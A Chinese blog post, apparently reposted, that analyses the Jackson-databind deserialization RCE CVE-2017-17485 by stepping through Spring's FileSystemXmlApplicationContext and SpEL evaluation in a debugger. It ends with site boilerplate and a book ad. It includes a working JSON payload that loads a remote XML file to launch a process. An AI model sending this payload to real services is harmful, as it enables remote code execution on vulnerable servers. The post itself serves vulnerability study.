内容简介:Jackson-databind的作用简单来说就是就是将json转换成对象。从payload来看,应该也是和
Jackson-databind的作用简单来说就是就是将json转换成对象。
0x02 漏洞分析
从payload来看,应该也是和
org.springframework.context.support.FileSystemXmlApplicationContext 这个有关系。
{"id":123, "obj": ["org.springframework.context.support.FileSystemXmlApplicationContext", "https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml"]}
在这个地方下一个断点
org/springframework/context/support/FileSystemXmlApplicationContext.class
通过idea可以通过 diagrams 的 Show Diagram Popup 查看类与接口之间的继承关系。
在 beanFactory 中有 getBean 的构造方法
而实际 getBean 的构造方法是在 AbstractBeanFactory 类中调用。
我们试着在 AbstractBeanFactory 类中的 getBean 方法下个断点也就是说程序通过一系列的json反序列化,以及反射机制进入到了 getBean 方法,并且获取到了这个 name 为pb的方法。
在org.springframework.beans.factory.support.BeanDefinitionValueResolver#resolveValueIfNecessary这里下断点,我看到经过 evaluate 处理之后 valueObject 等于我们要执行的 calc.exe 。
这里看一下 evaluate 方法的实现。
然后会继续解析 #{ pb.start() } ,对 #{ pb.start() } 进行spel操作。
当解析完 pb.start 操作后就会命令执行。
0x03 后话
回过头看一下发现 Weblogic-CVE-2019-2725 使用的 FileSystemXmlApplicationContext 和 CVE-2017-17485 使用的 FileSystemXmlApplicationContext 相比缺少了一步表达式解析,也就是
Object valueObject = this.evaluate(typedStringValue);
那我试试看,调整一下payload,当然也是可以的。
也就是说实际上 CVE-2017-17485 所用到的spring版本为5.0.2,它足够高,支持spel表达式的方法来初始化 bean 对象,而 Weblogic-CVE-2019-2725 所用到的spring版本过低,无法支持spel表达式,所以它需要通过指定 init-method 的方法来初始化 bean 对象。
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
微信小程序(开发入门及案例详解)
李骏、边思 / 机械工业出版社 / 2017-3-1 / 59.0
本书可分为3部分,第一部分作为基础章节,介绍了第一个小程序的搭建流程,让大家能快速上手;同时对小程序框架原理进行了详细介绍,为后面学习组件、API打下基础。 第二部分对小程序组件、API进行介绍,对组件、API的使用、注意事项进行详细讲解,并给出示例代码。 最后一部分精选5个由浅入深的案例,对小程序研发进行实战讲解,涵盖了实际项目中可能涉及的技术方案和使用方法,具备很强的实战意义。 ......一起来看看 《微信小程序(开发入门及案例详解)》 这本书的介绍吧!
